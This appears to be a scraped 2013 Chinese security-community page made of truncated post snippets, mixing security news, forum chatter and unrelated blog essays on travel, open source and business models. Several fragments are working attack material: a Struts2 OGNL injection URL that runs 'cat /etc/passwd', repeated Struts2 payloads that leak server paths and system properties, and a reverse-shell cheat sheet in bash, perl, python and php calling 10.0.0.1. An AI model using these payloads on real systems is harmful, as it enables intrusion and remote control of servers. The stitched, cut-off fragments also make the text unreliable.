http://www.example.com/struts2-showcase/employee/save.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 1# 基佬 (彩色避孕套，耐磨又耐操，用完还可以吹泡泡~) | 2013-07-17 16:11 前排留名 2# 陌路 | 2013-07-17 16:12 好像已经有人发过了 3# DragonEgg | 2013-07-17 16:13 @陌路 那个版块木有

Full Disclosure ASUS Wireless Routers Ten Models - Multiple Vulnerabilities on AiCloud enabled units From: kyle Lovett <krlovett () gmail com> Date: Sun, 14 Jul 2013 00:37:39 -0400 -------------------------------------------------------------------------------- From: kyle Lovett <krlovett () gmail com> Date: Sun, 14 Jul 2013 00:37:39 -0400 -------------------------------------------------------------------------------- Note: In June I released a partial disclosure for just the RT-N66U on the issue of directory traversal. I have only heard back from ASUS a

据安全研究公司IOActive最新发布的报告获悉，美国国内的一些紧急警报系统(EAS)现已成为易被攻陷的对象。据悉，EAS是一个可以在紧急情

最近 Linux 内核爆出了一个严重的安全漏洞，非root用户可以通过该漏洞的 exploit 获取root权限。这并不罕见，值得一提的是这个补丁看起来如此平常以至于我

黑客，曾经是一个神秘而帅气的词汇，让一代青少年向往，然而这些神秘的黑客们，也有自己的无奈和失落。 1998年6月16日，上海某信息网的工作人员

1. 异常包 TCP/UDP：端口值为0的包；校验和错误的包 TCP标志位异常包：SYN只能单独存在或只能和ACK共存，和其他标志共存就是异常包；没

这两天有点空，多写一些吧，上篇文章当中涉及到的【故事】其实还有太多太多，我就不记流水帐了，只挑对于多数人来说容易看懂的说说，抛砖引玉吧。 【本

RLO是微软的中东Unicode字符（Middleeast Unicode）中的一个，Unicode编码为0x202E，其作用是强制其后的字符

这个是要逆百度的天了么？？ 黑吊丝 (周哥，你好帅，就用你了！！！) | 2013-07-14 22:33 <script type="text/javascript" >BAIDU_CLB_SLOT_ID = "695398";</script> <script type="text/javascript" src="http://cbjs.baidu.com/js/o.js"></script> 效果自己保存为html看！！ 额 就不发明码了，太长了！！

1.社工库 如今主流的各种CMS爆出漏洞，让脱库事件频频发生，从前年的数据库泄漏事件，繁衍出了社工库这么一强大的玩意儿。从之前的比较出名上CC

防火墙一种运行在真正的应用逻辑之前的安全系统，正是因为它无法真正的嵌入到业务里所以天生的会存在缺陷，只不过这种缺陷是大还是小的问题，正常的架

提示：由于是盗链的百度网盘链接，所以如果链接过期、不能播放了，那就直接下载播放吧吧…… 下载地址： 神话 古筝版真爱.mp3 神话 美丽的神话 古筝版.

bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ，注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' python版本： python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' php版本： php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ruby版

自从乌云起来以后, 白帽子这个名词就火起来了, 各种大大小小的X客混迹于乌云, 美其名曰自己也是一个白帽子了 自己也有一个牛哄哄的身份象征了, 实际上

文章2004年就有了，转载注意版权！ 作者：马丁 martin@cnsea.org，来自:  www.cnsea.org  前言：这篇文章是“黑客张大民在IPv6世

2010版的，其他的版本，在这个基础上修个。欢迎多爆料。 网站物理路径: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) java.版本: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) os.name: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) os.arch ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) os.version ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) user.name ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d)) user.home 网站物理路径： java.home: \43req.getRealPath(%22\u005c%22) java.version: @java.lang.System@getProperty(%22java.version%22) os.name: @java.lang.System@getProperty(%22os.name%22) os.arch: @java.lang.System@getProperty(%22os.arch%22)

qq最新流氓蠕虫软件！尼玛不幸中招~ 围剿 | 2013-07-11 14:15 看到一个群里共享的信息： 于是下来先杀毒 没提示 打开后 却如下图： 会给所有的群发一条这样的信息！ 微博

一个0day被披露后，我们的网络世界会发生些什么事情？且听我细细道来。 1、事件背景 2013年6月7号，网上披露了一个针对Dedecms系统的

昨天的文章发出后，今天道哥的邮箱里收到了一封长长的信，是一个女孩写给他男朋友的分手信。男孩太花心，被女孩发现，导致了分手。这封信写的朴实中见

继续昨天的话题。 有个朋友问了我一个很有意思的问题： “道哥，我发现蛮大一部分聪明人都好色，智商跟好色有关系么？例子：曹操、纪晓岚、蒋介石等等。

有朋友问我：“道哥，想问下什么是不重复造轮子，我不是程序员，所以不太了解这句话的典故。” 这句话的出处我也不知道，但重复造轮子是经常会犯的错误

前面六篇文章已经把互联网怎么赚钱的方式总结的差不多了。今天再探讨探讨微信公众账号的盈利模式。 毋庸置疑的是，微信已经是一个大平台。任何一个产品

继昨天的国内推荐后，今天继续整理国外篇。 @十立 马来西亚的刁曼岛，新加坡过去很快，去年十一在东海岸清净，潜水。 @熊 日本石垣岛。赞爆了。4月份去

互联网中充斥着无数个链接，我们每天上网所做的事情，就是点开一个链接，跳转到另外一个链接。可你知道你点开的这些链接在背后里都做了些什么见不得人

前天请大家推荐一些鲜有人知的度假、旅游胜地，然后说好今天整理大家的推荐。之所以是今天贴出来，是因为我昨天在高铁上，不方便整理。 我可不是出门玩

继续聊聊大学。 我这个人对生活的记忆力一向不怎么好，所以现在每每回想起大学生涯，恍如隔世一般，很多记忆碎片都模糊了。以后再想起什么就写点什么吧

昨天收到了几百个提问和建议，很多话题都非常好，我已经记下了，会挑一些慢慢写来。今天先挑几个简单的。 时间回到十多年前，我刚上大学的时候，有一位

上回说到开源软件用的是赞助模式，由商业公司赞助基金会，基金会资助开源软件作者的开发。有朋友提醒我微软已经不在Linux基金会的赞助名单里了，

上回说到，支撑起整个互联网快速发展的是开源软件。 可以说，如果没有开源软件以及自由软件运动，互联网的发展至少会滞后十年。今天从操作系统、网络管

上回说到，互联网公司用的最多的，是被称为Freemium（免费增值）的盈利模式。 免费增值模式几乎已经成为了“互联网模式”的代名词。人们提到互